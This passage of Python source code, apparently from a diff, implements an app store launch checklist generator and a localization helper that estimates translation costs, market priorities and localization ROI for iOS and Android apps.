{'task': 'App tested on required iOS versions', 'status': 'pending'},
|
||||
{'task': 'Crash-free rate > 99%', 'status': 'pending'},
|
||||
{'task': 'All links in app/metadata working', 'status': 'pending'}
|
||||
]
|
||||
},
|
||||
{
|
||||
'category': 'Legal & Privacy (Apple)',
|
||||
'items': [
|
||||
{'task': 'Privacy Policy URL provided', 'status': 'pending'},
|
||||
{'task': 'Terms of Service URL (if applicable)', 'status': 'pending'},
|
||||
{'task': 'Data collection declarations accurate', 'status': 'pending'},
|
||||
{'task': 'Third-party SDKs disclosed', 'status': 'pending'}
|
||||
]
|
||||
}
|
||||
]
|
||||
|
||||
def _generate_google_checklist(self, app_info: Dict[str, Any]) -> List[Dict[str, Any]]:
|
||||
"""Generate Google Play Store specific checklist."""
|
||||
return [
|
||||
{
|
||||
'category': 'Play Console Setup',
|
||||
'items': [
|
||||
{'task': 'Google Play Console account created', 'status': 'pending'},
|
||||
{'task': 'Developer profile completed', 'status': 'pending'},
|
||||
{'task': 'Payment merchant account linked (if paid app)', 'status': 'pending'},
|
||||
{'task': 'Content rating questionnaire completed', 'status': 'pending'}
|
||||
]
|
||||
},
|
||||
{
|
||||
'category': 'Metadata (Google)',
|
||||
'items': [
|
||||
{'task': 'App title (50 chars max)', 'status': 'pending'},
|
||||
{'task': 'Short description (80 chars max)', 'status': 'pending'},
|
||||
{'task': 'Full description (4000 chars max)', 'status': 'pending'},
|
||||
{'task': 'Category selection', 'status': 'pending'},
|
||||
{'task': 'Tags (up to 5)', 'status': 'pending'}
|
||||
]
|
||||
},
|
||||
{
|
||||
'category': 'Visual Assets (Google)',
|
||||
'items': [
|
||||
{'task': 'App icon (512x512px)', 'status': 'pending'},
|
||||
{'task': 'Feature graphic (1024x500px)', 'status': 'pending'},
|
||||
{'task': 'Screenshots (2-8 required, phone)', 'status': 'pending'},
|
||||
{'task': 'Screenshots (tablet, if applicable)', 'status': 'pending'},
|
||||
{'task': 'Promo video (YouTube link, optional)', 'status': 'pending'}
|
||||
]
|
||||
},
|
||||
{
|
||||
'category': 'Technical Requirements (Google)',
|
||||
'items': [
|
||||
{'task': 'APK/AAB uploaded to Play Console', 'status': 'pending'},
|
||||
{'task': 'Internal testing completed', 'status': 'pending'},
|
||||
{'task': 'App tested on required Android versions', 'status': 'pending'},
|
||||
{'task': 'Target API level meets requirements', 'status': 'pending'},
|
||||
{'task': 'All permissions justified', 'status': 'pending'}
|
||||
]
|
||||
},
|
||||
{
|
||||
'category': 'Legal & Privacy (Google)',
|
||||
'items': [
|
||||
{'task': 'Privacy Policy URL provided', 'status': 'pending'},
|
||||
{'task': 'Data safety section completed', 'status': 'pending'},
|
||||
{'task': 'Ads disclosure (if applicable)', 'status': 'pending'},
|
||||
{'task': 'In-app purchase disclosure (if applicable)', 'status': 'pending'}
|
||||
]
|
||||
}
|
||||
]
|
||||
|
||||
def _generate_universal_checklist(self, app_info: Dict[str, Any]) -> List[Dict[str, Any]]:
|
||||
"""Generate universal (both platforms) checklist."""
|
||||
return [
|
||||
{
|
||||
'category': 'Pre-Launch Marketing',
|
||||
'items': [
|
||||
{'task': 'Landing page created', 'status': 'pending'},
|
||||
{'task': 'Social media accounts setup', 'status': 'pending'},
|
||||
{'task': 'Press kit prepared', 'status': 'pending'},
|
||||
{'task': 'Beta tester feedback collected', 'status': 'pending'},
|
||||
{'task': 'Launch announcement drafted', 'status': 'pending'}
|
||||
]
|
||||
},
|
||||
{
|
||||
'category': 'ASO Preparation',
|
||||
'items': [
|
||||
{'task': 'Keyword research completed', 'status': 'pending'},
|
||||
{'task': 'Competitor analysis done', 'status': 'pending'},
|
||||
{'task': 'A/B test plan created for post-launch', 'status': 'pending'},
|
||||
{'task': 'Analytics tracking configured', 'status': 'pending'}
|
||||
]
|
||||
},
|
||||
{
|
||||
'category': 'Quality Assurance',
|
||||
'items': [
|
||||
{'task': 'All core features tested', 'status': 'pending'},
|
||||
{'task': 'User flows validated', 'status': 'pending'},
|
||||
{'task': 'Performance testing completed', 'status': 'pending'},
|
||||
{'task': 'Accessibility features tested', 'status': 'pending'},
|
||||
{'task': 'Security audit completed', 'status': 'pending'}
|
||||
]
|
||||
},
|
||||
{
|
||||
'category': 'Support Infrastructure',
|
||||
'items': [
|
||||
{'task': 'Support email/system setup', 'status': 'pending'},
|
||||
{'task': 'FAQ page created', 'status': 'pending'},
|
||||
{'task': 'Documentation for users prepared', 'status': 'pending'},
|
||||
{'task': 'Team trained on handling reviews', 'status': 'pending'}
|
||||
]
|
||||
}
|
||||
]
|
||||
|
||||
def _generate_launch_timeline(self, launch_date: str) -> List[Dict[str, Any]]:
|
||||
"""Generate timeline with milestones leading to launch."""
|
||||
launch_dt = datetime.strptime(launch_date, '%Y-%m-%d')
|
||||
|
||||
milestones = [
|
||||
{
|
||||
'date': (launch_dt - timedelta(days=90)).strftime('%Y-%m-%d'),
|
||||
'milestone': '90 days before: Complete keyword research and competitor analysis'
|
||||
},
|
||||
{
|
||||
'date': (launch_dt - timedelta(days=60)).strftime('%Y-%m-%d'),
|
||||
'milestone': '60 days before: Finalize metadata and visual assets'
|
||||
},
|
||||
{
|
||||
'date': (launch_dt - timedelta(days=45)).strftime('%Y-%m-%d'),
|
||||
'milestone': '45 days before: Begin beta testing program'
|
||||
},
|
||||
{
|
||||
'date': (launch_dt - timedelta(days=30)).strftime('%Y-%m-%d'),
|
||||
'milestone': '30 days before: Submit app for review (Apple typically takes 1-2 days, Google instant)'
|
||||
},
|
||||
{
|
||||
'date': (launch_dt - timedelta(days=14)).strftime('%Y-%m-%d'),
|
||||
'milestone': '14 days before: Prepare launch marketing materials'
|
||||
},
|
||||
{
|
||||
'date': (launch_dt - timedelta(days=7)).strftime('%Y-%m-%d'),
|
||||
'milestone': '7 days before: Set up analytics and monitoring'
|
||||
},
|
||||
{
|
||||
'date': launch_dt.strftime('%Y-%m-%d'),
|
||||
'milestone': 'Launch Day: Release app and execute marketing plan'
|
||||
},
|
||||
{
|
||||
'date': (launch_dt + timedelta(days=7)).strftime('%Y-%m-%d'),
|
||||
'milestone': '7 days after: Monitor metrics, respond to reviews, address critical issues'
|
||||
},
|
||||
{
|
||||
'date': (launch_dt + timedelta(days=30)).strftime('%Y-%m-%d'),
|
||||
'milestone': '30 days after: Analyze launch metrics, plan first update'
|
||||
}
|
||||
]
|
||||
|
||||
return milestones
|
||||
|
||||
def _calculate_checklist_summary(self, checklists: Dict[str, List[Dict[str, Any]]]) -> Dict[str, Any]:
|
||||
"""Calculate completion summary."""
|
||||
total_items = 0
|
||||
completed_items = 0
|
||||
|
||||
for platform, categories in checklists.items():
|
||||
for category in categories:
|
||||
for item in category['items']:
|
||||
total_items += 1
|
||||
if item['status'] == 'completed':
|
||||
completed_items += 1
|
||||
|
||||
completion_percentage = (completed_items / total_items * 100) if total_items > 0 else 0
|
||||
|
||||
return {
|
||||
'total_items': total_items,
|
||||
'completed_items': completed_items,
|
||||
'pending_items': total_items - completed_items,
|
||||
'completion_percentage': round(completion_percentage, 1),
|
||||
'is_ready_to_launch': completion_percentage == 100
|
||||
}
|
||||
|
||||
def _validate_apple_compliance(
|
||||
self,
|
||||
app_data: Dict[str, Any],
|
||||
validation_results: Dict[str, Any]
|
||||
) -> None:
|
||||
"""Validate Apple App Store compliance."""
|
||||
# Check for required fields
|
||||
if not app_data.get('privacy_policy_url'):
|
||||
validation_results['errors'].append("Privacy Policy URL is required")
|
||||
|
||||
if not app_data.get('app_icon'):
|
||||
validation_results['errors'].append("App icon (1024x1024px) is required")
|
||||
|
||||
# Check metadata character limits
|
||||
title = app_data.get('title', '')
|
||||
if len(title) > 30:
|
||||
validation_results['errors'].append(f"Title exceeds 30 characters ({len(title)})")
|
||||
|
||||
# Warnings for best practices
|
||||
subtitle = app_data.get('subtitle', '')
|
||||
if not subtitle:
|
||||
        validation_results['warnings'].append("Subtitle is empty - consider adding for better discoverability")

        keywords = app_data.get('keywords', '')
        if len(keywords) < 80:
            validation_results['warnings'].append(
                f"Keywords field underutilized ({len(keywords)}/100 chars) - add more keywords"
            )

    def _validate_google_compliance(
        self,
        app_data: Dict[str, Any],
        validation_results: Dict[str, Any]
    ) -> None:
        """Validate Google Play Store compliance."""
        # Check for required fields
        if not app_data.get('privacy_policy_url'):
            validation_results['errors'].append("Privacy Policy URL is required")

        if not app_data.get('feature_graphic'):
            validation_results['errors'].append("Feature graphic (1024x500px) is required")

        # Check metadata character limits
        title = app_data.get('title', '')
        if len(title) > 50:
            validation_results['errors'].append(f"Title exceeds 50 characters ({len(title)})")

        short_desc = app_data.get('short_description', '')
        if len(short_desc) > 80:
            validation_results['errors'].append(f"Short description exceeds 80 characters ({len(short_desc)})")

        # Warnings
        if not short_desc:
            validation_results['warnings'].append("Short description is empty")

    def _calculate_next_versions(
        self,
        current_version: str,
        update_frequency: str,
        feature_count: int
    ) -> List[str]:
        """Calculate next version numbers."""
        # Parse current version (assume semantic versioning)
        parts = current_version.split('.')
        major, minor, patch = int(parts[0]), int(parts[1]), int(parts[2] if len(parts) > 2 else 0)

        versions = []
        for i in range(feature_count):
            if update_frequency == 'weekly':
                patch += 1
            elif update_frequency == 'biweekly':
                patch += 1
            elif update_frequency == 'monthly':
                minor += 1
                patch = 0
            else:  # quarterly
                minor += 1
                patch = 0

            versions.append(f"{major}.{minor}.{patch}")

        return versions

    def _distribute_features(
        self,
        features: List[str],
        versions: List[str]
    ) -> List[Dict[str, Any]]:
        """Distribute features across versions."""
        features_per_version = max(1, len(features) // len(versions))

        schedule = []
        for i, version in enumerate(versions):
            start_idx = i * features_per_version
            end_idx = start_idx + features_per_version if i < len(versions) - 1 else len(features)

            schedule.append({
                'version': version,
                'features': features[start_idx:end_idx],
                'release_priority': 'high' if i == 0 else ('medium' if i < len(versions) // 2 else 'low')
            })

        return schedule

    def _generate_whats_new_template(self, version_data: Dict[str, Any]) -> Dict[str, str]:
        """Generate What's New template for version."""
        features_list = '\n'.join([f"• {feature}" for feature in version_data['features']])

        template = f"""Version {version_data['version']}

{features_list}

We're constantly improving your experience. Thanks for using [App Name]!

Have feedback? Contact us at support@[company].com"""

        return {
            'version': version_data['version'],
            'template': template
        }

    def _generate_update_recommendations(self, update_frequency: str) -> List[str]:
        """Generate recommendations for update strategy."""
        recommendations = []

        if update_frequency == 'weekly':
            recommendations.append("Weekly updates show active development but ensure quality doesn't suffer")
        elif update_frequency == 'monthly':
            recommendations.append("Monthly updates are optimal for most apps - balance features and stability")

        recommendations.extend([
            "Include bug fixes in every update",
            "Update 'What's New' section with each release",
            "Respond to reviews mentioning fixed issues"
        ])

        return recommendations

    def _recommend_day_of_week(self, app_category: str) -> Dict[str, Any]:
        """Recommend best day of week to launch."""
        # General recommendations based on category
        if app_category.lower() in ['games', 'entertainment']:
            return {
                'recommended_day': 'Thursday',
                'rationale': 'People download entertainment apps before weekend'
            }
        elif app_category.lower() in ['productivity', 'business']:
            return {
                'recommended_day': 'Tuesday',
                'rationale': 'Business users most active mid-week'
            }
        else:
            return {
                'recommended_day': 'Wednesday',
                'rationale': 'Mid-week provides good balance and review potential'
            }

    def _recommend_seasonal_timing(self, app_category: str, current_date: str) -> Dict[str, Any]:
        """Recommend seasonal timing considerations."""
        current_dt = datetime.strptime(current_date, '%Y-%m-%d')
        month = current_dt.month

        # Avoid certain periods
        avoid_periods = []
        if month == 12:
            avoid_periods.append("Late December - low user engagement during holidays")
        if month in [7, 8]:
            avoid_periods.append("Summer months - some categories see lower engagement")

        # Recommend periods
        good_periods = []
        if month in [1, 9]:
            good_periods.append("New Year/Back-to-school - high user engagement")
        if month in [10, 11]:
            good_periods.append("Pre-holiday season - good for shopping/gift apps")

        return {
            'current_month': month,
            'avoid_periods': avoid_periods,
            'good_periods': good_periods
        }

    def _analyze_competitive_timing(self, app_category: str) -> Dict[str, str]:
        """Analyze competitive timing considerations."""
        return {
            'recommendation': 'Research competitor launch schedules in your category',
            'strategy': 'Avoid launching same week as major competitor updates'
        }

    def _calculate_optimal_dates(
        self,
        current_date: str,
        day_rec: Dict[str, Any],
        seasonal_rec: Dict[str, Any]
    ) -> List[str]:
        """Calculate optimal launch dates."""
        current_dt = datetime.strptime(current_date, '%Y-%m-%d')

        # Find next occurrence of recommended day
        target_day = day_rec['recommended_day']
        days_map = {'Monday': 0, 'Tuesday': 1, 'Wednesday': 2, 'Thursday': 3, 'Friday': 4}
        target_day_num = days_map.get(target_day, 2)

        days_ahead = (target_day_num - current_dt.weekday()) % 7
        if days_ahead == 0:
            days_ahead = 7

        next_target_date = current_dt + timedelta(days=days_ahead)

        optimal_dates = [
            next_target_date.strftime('%Y-%m-%d'),
            (next_target_date + timedelta(days=7)).strftime('%Y-%m-%d'),
            (next_target_date + timedelta(days=14)).strftime('%Y-%m-%d')
        ]

        return optimal_dates

    def _generate_timing_recommendation(
        self,
        optimal_dates: List[str],
        seasonal_rec: Dict[str, Any]
    ) -> str:
        """Generate final timing recommendation."""
        if seasonal_rec['avoid_periods']:
            return f"Consider launching in {optimal_dates[1]} to avoid {seasonal_rec['avoid_periods'][0]}"
        elif seasonal_rec['good_periods']:
            return f"Launch on {optimal_dates[0]} to capitalize on {seasonal_rec['good_periods'][0]}"
        else:
            return f"Recommended launch date: {optimal_dates[0]}"

    def _identify_seasonal_opportunities(
        self,
        app_category: str,
        current_month: int
    ) -> List[Dict[str, Any]]:
        """Identify seasonal opportunities for category."""
        opportunities = []

        # Universal opportunities
        if current_month == 1:
            opportunities.append({
                'event': 'New Year Resolutions',
                'dates': 'January 1-31',
                'relevance': 'high' if app_category.lower() in ['health', 'fitness', 'productivity'] else 'medium'
            })

        if current_month in [11, 12]:
            opportunities.append({
                'event': 'Holiday Shopping Season',
                'dates': 'November-December',
                'relevance': 'high' if app_category.lower() in ['shopping', 'gifts'] else 'low'
            })

        # Category-specific
        if app_category.lower() == 'education' and current_month in [8, 9]:
            opportunities.append({
                'event': 'Back to School',
                'dates': 'August-September',
                'relevance': 'high'
            })

        return opportunities

    def _generate_seasonal_campaign(self, opportunity: Dict[str, Any]) -> Dict[str, Any]:
        """Generate campaign idea for seasonal opportunity."""
        return {
            'event': opportunity['event'],
            'campaign_idea': f"Create themed visuals and messaging for {opportunity['event']}",
            'metadata_updates': 'Update app description and screenshots with seasonal themes',
            'promotion_strategy': 'Consider limited-time features or discounts'
        }

    def _create_seasonal_timeline(self, campaigns: List[Dict[str, Any]]) -> List[str]:
        """Create implementation timeline for campaigns."""
        return [
            f"30 days before: Plan {campaign['event']} campaign strategy"
            for campaign in campaigns
        ]


def generate_launch_checklist(
    platform: str,
    app_info: Dict[str, Any],
    launch_date: Optional[str] = None
) -> Dict[str, Any]:
    """
    Convenience function to generate launch checklist.

    Args:
        platform: Platform ('apple', 'google', or 'both')
        app_info: App information
        launch_date: Target launch date

    Returns:
        Complete launch checklist
    """
    generator = LaunchChecklistGenerator(platform)
    return generator.generate_prelaunch_checklist(app_info, launch_date)
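The `_calculate_optimal_dates` helper above uses the standard modular-arithmetic trick for finding the next occurrence of a given weekday. A self-contained sketch of just that step (the `next_weekday` name is illustrative, not part of the module):

```python
from datetime import datetime, timedelta

def next_weekday(current_date: str, target_day_num: int) -> str:
    """Return the next occurrence of target_day_num (Mon=0) strictly after current_date."""
    current_dt = datetime.strptime(current_date, '%Y-%m-%d')
    # Modular difference gives 0..6 days until the target weekday
    days_ahead = (target_day_num - current_dt.weekday()) % 7
    if days_ahead == 0:  # same weekday today: push a full week out
        days_ahead = 7
    return (current_dt + timedelta(days=days_ahead)).strftime('%Y-%m-%d')

# 2024-01-01 is a Monday; the next Thursday (3) is 2024-01-04
print(next_weekday('2024-01-01', 3))
```

The `% 7` wrap is what makes the calculation work regardless of whether the target day falls earlier or later in the current week.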
@ -0,0 +1,588 @@
"""
Localization helper module for App Store Optimization.
Manages multi-language ASO optimization strategies.
"""

from typing import Dict, List, Any, Optional, Tuple


class LocalizationHelper:
    """Helps manage multi-language ASO optimization."""

    # Priority markets by language (based on app store revenue and user base)
    PRIORITY_MARKETS = {
        'tier_1': [
            {'language': 'en-US', 'market': 'United States', 'revenue_share': 0.25},
            {'language': 'zh-CN', 'market': 'China', 'revenue_share': 0.20},
            {'language': 'ja-JP', 'market': 'Japan', 'revenue_share': 0.10},
            {'language': 'de-DE', 'market': 'Germany', 'revenue_share': 0.08},
            {'language': 'en-GB', 'market': 'United Kingdom', 'revenue_share': 0.06}
        ],
        'tier_2': [
            {'language': 'fr-FR', 'market': 'France', 'revenue_share': 0.05},
            {'language': 'ko-KR', 'market': 'South Korea', 'revenue_share': 0.05},
            {'language': 'es-ES', 'market': 'Spain', 'revenue_share': 0.03},
            {'language': 'it-IT', 'market': 'Italy', 'revenue_share': 0.03},
            {'language': 'pt-BR', 'market': 'Brazil', 'revenue_share': 0.03}
        ],
        'tier_3': [
            {'language': 'ru-RU', 'market': 'Russia', 'revenue_share': 0.02},
            {'language': 'es-MX', 'market': 'Mexico', 'revenue_share': 0.02},
            {'language': 'nl-NL', 'market': 'Netherlands', 'revenue_share': 0.02},
            {'language': 'sv-SE', 'market': 'Sweden', 'revenue_share': 0.01},
            {'language': 'pl-PL', 'market': 'Poland', 'revenue_share': 0.01}
        ]
    }

    # Character limit multipliers by language (some languages need more/less space)
    CHAR_MULTIPLIERS = {
        'en': 1.0,
        'zh': 0.6,  # Chinese characters are more compact
        'ja': 0.7,  # Japanese uses kanji
        'ko': 0.8,  # Korean is relatively compact
        'de': 1.3,  # German words are typically longer
        'fr': 1.2,  # French tends to be longer
        'es': 1.1,  # Spanish slightly longer
        'pt': 1.1,  # Portuguese similar to Spanish
        'ru': 1.1,  # Russian similar length
        'ar': 1.0,  # Arabic varies
        'it': 1.1   # Italian similar to Spanish
    }

    def __init__(self, app_category: str = 'general'):
        """
        Initialize localization helper.

        Args:
            app_category: App category to prioritize relevant markets
        """
        self.app_category = app_category
        self.localization_plans = []

    def identify_target_markets(
        self,
        current_market: str = 'en-US',
        budget_level: str = 'medium',
        target_market_count: int = 5
    ) -> Dict[str, Any]:
        """
        Recommend priority markets for localization.

        Args:
            current_market: Current/primary market
            budget_level: 'low', 'medium', or 'high'
            target_market_count: Number of markets to target

        Returns:
            Prioritized market recommendations
        """
        # Determine tier priorities based on budget
        if budget_level == 'low':
            priority_tiers = ['tier_1']
            max_markets = min(target_market_count, 3)
        elif budget_level == 'medium':
            priority_tiers = ['tier_1', 'tier_2']
            max_markets = min(target_market_count, 8)
        else:  # high budget
            priority_tiers = ['tier_1', 'tier_2', 'tier_3']
            max_markets = target_market_count

        # Collect markets from priority tiers
        recommended_markets = []
        for tier in priority_tiers:
            for market in self.PRIORITY_MARKETS[tier]:
                if market['language'] != current_market:
                    recommended_markets.append({
                        **market,
                        'tier': tier,
                        'estimated_translation_cost': self._estimate_translation_cost(
                            market['language']
                        )
                    })

        # Sort by revenue share and limit
        recommended_markets.sort(key=lambda x: x['revenue_share'], reverse=True)
        recommended_markets = recommended_markets[:max_markets]

        # Calculate potential ROI
        total_potential_revenue_share = sum(m['revenue_share'] for m in recommended_markets)

        return {
            'recommended_markets': recommended_markets,
            'total_markets': len(recommended_markets),
            'estimated_total_revenue_lift': f"{total_potential_revenue_share*100:.1f}%",
            'estimated_cost': self._estimate_total_localization_cost(recommended_markets),
            'implementation_priority': self._prioritize_implementation(recommended_markets)
        }

    def translate_metadata(
        self,
        source_metadata: Dict[str, str],
        source_language: str,
        target_language: str,
        platform: str = 'apple'
    ) -> Dict[str, Any]:
        """
        Generate localized metadata with character limit considerations.

        Args:
            source_metadata: Original metadata (title, description, etc.)
            source_language: Source language code (e.g., 'en')
            target_language: Target language code (e.g., 'es')
            platform: 'apple' or 'google'

        Returns:
            Localized metadata with character limit validation
        """
        # Get character multiplier
        target_lang_code = target_language.split('-')[0]
        char_multiplier = self.CHAR_MULTIPLIERS.get(target_lang_code, 1.0)

        # Platform-specific limits
        if platform == 'apple':
            limits = {'title': 30, 'subtitle': 30, 'description': 4000, 'keywords': 100}
        else:
            limits = {'title': 50, 'short_description': 80, 'description': 4000}

        localized_metadata = {}
        warnings = []

        for field, text in source_metadata.items():
            if field not in limits:
                continue

            # Estimate target length
            estimated_length = int(len(text) * char_multiplier)
            limit = limits[field]

            localized_metadata[field] = {
                'original_text': text,
                'original_length': len(text),
                'estimated_target_length': estimated_length,
                'character_limit': limit,
                'fits_within_limit': estimated_length <= limit,
                'translation_notes': self._get_translation_notes(
                    field,
                    target_language,
                    estimated_length,
                    limit
                )
            }

            if estimated_length > limit:
                warnings.append(
                    f"{field}: Estimated length ({estimated_length}) may exceed limit ({limit}) - "
                    f"condensing may be required"
                )

        return {
            'source_language': source_language,
            'target_language': target_language,
            'platform': platform,
            'localized_fields': localized_metadata,
            'character_multiplier': char_multiplier,
            'warnings': warnings,
            'recommendations': self._generate_translation_recommendations(
                target_language,
                warnings
            )
        }

    def adapt_keywords(
        self,
        source_keywords: List[str],
        source_language: str,
        target_language: str,
        target_market: str
    ) -> Dict[str, Any]:
        """
        Adapt keywords for target market (not just direct translation).

        Args:
            source_keywords: Original keywords
            source_language: Source language code
            target_language: Target language code
            target_market: Target market (e.g., 'France', 'Japan')

        Returns:
            Adapted keyword recommendations
        """
        # Cultural adaptation considerations (market-level notes)
        cultural_notes = self._get_cultural_keyword_considerations(target_market)

        # Search behavior differences
        search_patterns = self._get_search_patterns(target_market)

        adapted_keywords = []
        for keyword in source_keywords:
            adapted_keywords.append({
                'source_keyword': keyword,
                'adaptation_strategy': self._determine_adaptation_strategy(
                    keyword,
                    target_market
                ),
                'cultural_considerations': cultural_notes,
                'priority': 'high' if keyword in source_keywords[:3] else 'medium'
            })

        return {
            'source_language': source_language,
            'target_language': target_language,
            'target_market': target_market,
            'adapted_keywords': adapted_keywords,
            'search_behavior_notes': search_patterns,
            'recommendations': [
                'Use native speakers for keyword research',
                'Test keywords with local users before finalizing',
                "Consider local competitors' keyword strategies",
                'Monitor search trends in target market'
            ]
        }

    def validate_translations(
        self,
        translated_metadata: Dict[str, str],
        target_language: str,
        platform: str = 'apple'
    ) -> Dict[str, Any]:
        """
        Validate translated metadata for character limits and quality.

        Args:
            translated_metadata: Translated text fields
            target_language: Target language code
            platform: 'apple' or 'google'

        Returns:
            Validation report
        """
        # Platform limits
        if platform == 'apple':
            limits = {'title': 30, 'subtitle': 30, 'description': 4000, 'keywords': 100}
        else:
            limits = {'title': 50, 'short_description': 80, 'description': 4000}

        validation_results = {
            'is_valid': True,
            'field_validations': {},
            'errors': [],
            'warnings': []
        }

        for field, text in translated_metadata.items():
            if field not in limits:
                continue

            actual_length = len(text)
            limit = limits[field]
            is_within_limit = actual_length <= limit

            validation_results['field_validations'][field] = {
                'text': text,
                'length': actual_length,
                'limit': limit,
                'is_valid': is_within_limit,
                'usage_percentage': round((actual_length / limit) * 100, 1)
            }

            if not is_within_limit:
                validation_results['is_valid'] = False
                validation_results['errors'].append(
                    f"{field} exceeds limit: {actual_length}/{limit} characters"
                )

        # Quality checks
        quality_issues = self._check_translation_quality(
            translated_metadata,
            target_language
        )

        validation_results['quality_checks'] = quality_issues

        if quality_issues:
            validation_results['warnings'].extend(
                [f"Quality issue: {issue}" for issue in quality_issues]
            )

        return validation_results

    def calculate_localization_roi(
        self,
        target_markets: List[str],
        current_monthly_downloads: int,
        localization_cost: float,
        expected_lift_percentage: float = 0.15
    ) -> Dict[str, Any]:
        """
        Estimate ROI of localization investment.

        Args:
            target_markets: List of market codes
            current_monthly_downloads: Current monthly downloads
            localization_cost: Total cost to localize
            expected_lift_percentage: Expected download increase (default 15%)

        Returns:
            ROI analysis
        """
        # Estimate market-specific lift
        market_data = []
        total_expected_lift = 0

        for market_code in target_markets:
            # Find market in priority lists
            market_info = None
            for tier_name, markets in self.PRIORITY_MARKETS.items():
                for m in markets:
                    if m['language'] == market_code:
                        market_info = m
                        break

            if not market_info:
                continue

            # Estimate downloads from this market
            market_downloads = int(current_monthly_downloads * market_info['revenue_share'])
            expected_increase = int(market_downloads * expected_lift_percentage)
            total_expected_lift += expected_increase

            market_data.append({
                'market': market_info['market'],
                'current_monthly_downloads': market_downloads,
                'expected_increase': expected_increase,
                'revenue_potential': market_info['revenue_share']
            })

        # Calculate payback period (assuming $2 revenue per download)
        revenue_per_download = 2.0
        monthly_additional_revenue = total_expected_lift * revenue_per_download
        payback_months = (localization_cost / monthly_additional_revenue) if monthly_additional_revenue > 0 else float('inf')

        return {
            'markets_analyzed': len(market_data),
            'market_breakdown': market_data,
            'total_expected_monthly_lift': total_expected_lift,
            'expected_monthly_revenue_increase': f"${monthly_additional_revenue:,.2f}",
            'localization_cost': f"${localization_cost:,.2f}",
            'payback_period_months': round(payback_months, 1) if payback_months != float('inf') else 'N/A',
            'annual_roi': f"{((monthly_additional_revenue * 12 - localization_cost) / localization_cost * 100):.1f}%" if payback_months != float('inf') else 'Negative',
            'recommendation': self._generate_roi_recommendation(payback_months)
        }

    def _estimate_translation_cost(self, language: str) -> Dict[str, float]:
        """Estimate translation cost for a language."""
        # Base cost per word (professional translation)
        base_cost_per_word = 0.12

        # Language-specific multipliers
        multipliers = {
            'zh-CN': 1.5,  # Chinese requires specialist
            'ja-JP': 1.5,  # Japanese requires specialist
            'ko-KR': 1.3,
            'ar-SA': 1.4,  # Arabic (right-to-left)
            'default': 1.0
        }

        multiplier = multipliers.get(language, multipliers['default'])

        # Typical word counts for app store metadata
        typical_word_counts = {
            'title': 5,
            'subtitle': 5,
            'description': 300,
            'keywords': 20,
            'screenshots': 50  # Caption text
        }

        total_words = sum(typical_word_counts.values())
        estimated_cost = total_words * base_cost_per_word * multiplier

        return {
            'cost_per_word': base_cost_per_word * multiplier,
            'total_words': total_words,
            'estimated_cost': round(estimated_cost, 2)
        }

    def _estimate_total_localization_cost(self, markets: List[Dict[str, Any]]) -> str:
        """Estimate total cost for multiple markets."""
        total = sum(m['estimated_translation_cost']['estimated_cost'] for m in markets)
        return f"${total:,.2f}"

    def _prioritize_implementation(self, markets: List[Dict[str, Any]]) -> List[Dict[str, str]]:
        """Create phased implementation plan."""
        phases = []

        # Phase 1: Top revenue markets
        phase_1 = markets[:3]
        if phase_1:
            phases.append({
                'phase': 'Phase 1 (First 30 days)',
                'markets': ', '.join([m['market'] for m in phase_1]),
                'rationale': 'Highest revenue potential markets'
            })

        # Phase 2: Remaining tier 1 and top tier 2
        phase_2 = markets[3:6]
        if phase_2:
            phases.append({
                'phase': 'Phase 2 (Days 31-60)',
                'markets': ', '.join([m['market'] for m in phase_2]),
                'rationale': 'Strong revenue markets with good ROI'
            })

        # Phase 3: Remaining markets
        phase_3 = markets[6:]
        if phase_3:
            phases.append({
                'phase': 'Phase 3 (Days 61-90)',
                'markets': ', '.join([m['market'] for m in phase_3]),
                'rationale': 'Complete global coverage'
            })

        return phases

    def _get_translation_notes(
        self,
        field: str,
        target_language: str,
        estimated_length: int,
        limit: int
    ) -> List[str]:
        """Get translation-specific notes for field."""
        notes = []

        if estimated_length > limit:
            notes.append(f"Condensing required - aim for {limit - 10} characters to allow buffer")

        if field == 'title' and target_language.startswith('zh'):
            notes.append("Chinese characters convey more meaning - may need fewer characters")

        if field == 'keywords' and target_language.startswith('de'):
            notes.append("German compound words may be longer - prioritize shorter keywords")

        return notes

    def _generate_translation_recommendations(
        self,
        target_language: str,
        warnings: List[str]
    ) -> List[str]:
        """Generate translation recommendations."""
        recommendations = [
            "Use professional native speakers for translation",
            "Test translations with local users before finalizing"
        ]

        if warnings:
            recommendations.append("Work with translator to condense text while preserving meaning")

        if target_language.startswith('zh') or target_language.startswith('ja'):
            recommendations.append("Consider cultural context and local idioms")

        return recommendations

    def _get_cultural_keyword_considerations(self, target_market: str) -> List[str]:
        """Get cultural considerations for keywords by market."""
        # Simplified example - real implementation would be more comprehensive
        considerations = {
            'China': ['Avoid politically sensitive terms', 'Consider local alternatives to blocked services'],
            'Japan': ['Honorific language important', 'Technical terms often use katakana'],
            'Germany': ['Privacy and security terms resonate', 'Efficiency and quality valued'],
            'France': ['French language protection laws', 'Prefer French terms over English'],
            'default': ['Research local search behavior', 'Test with native speakers']
        }

        return considerations.get(target_market, considerations['default'])

    def _get_search_patterns(self, target_market: str) -> List[str]:
        """Get search pattern notes for market."""
        patterns = {
            'China': ['Use both simplified characters and romanization', 'Brand names often romanized'],
            'Japan': ['Mix of kanji, hiragana, and katakana', 'English words common in tech'],
            'Germany': ['Compound words common', 'Specific technical terminology'],
            'default': ['Research local search trends', 'Monitor competitor keywords']
        }

        return patterns.get(target_market, patterns['default'])

    def _determine_adaptation_strategy(self, keyword: str, target_market: str) -> str:
        """Determine how to adapt keyword for market."""
        # Simplified logic
        if target_market in ['China', 'Japan', 'Korea']:
            return 'full_localization'  # Complete translation needed
        elif target_market in ['Germany', 'France', 'Spain']:
            return 'adapt_and_translate'  # Some adaptation needed
        else:
            return 'direct_translation'  # Direct translation usually sufficient

    def _check_translation_quality(
        self,
        translated_metadata: Dict[str, str],
        target_language: str
    ) -> List[str]:
        """Basic quality checks for translations."""
        issues = []

        # Check for untranslated placeholders
        for field, text in translated_metadata.items():
            if '[' in text or '{' in text or 'TODO' in text.upper():
                issues.append(f"{field} contains placeholder text")

        # Check for excessive punctuation
        for field, text in translated_metadata.items():
            if text.count('!') > 3:
                issues.append(f"{field} has excessive exclamation marks")

        return issues

    def _generate_roi_recommendation(self, payback_months: float) -> str:
        """Generate ROI recommendation."""
        if payback_months <= 3:
            return "Excellent ROI - proceed immediately"
        elif payback_months <= 6:
            return "Good ROI - recommended investment"
        elif payback_months <= 12:
            return "Moderate ROI - consider if strategic market"
        else:
            return "Low ROI - reconsider or focus on higher-priority markets first"


def plan_localization_strategy(
    current_market: str,
    budget_level: str,
    monthly_downloads: int
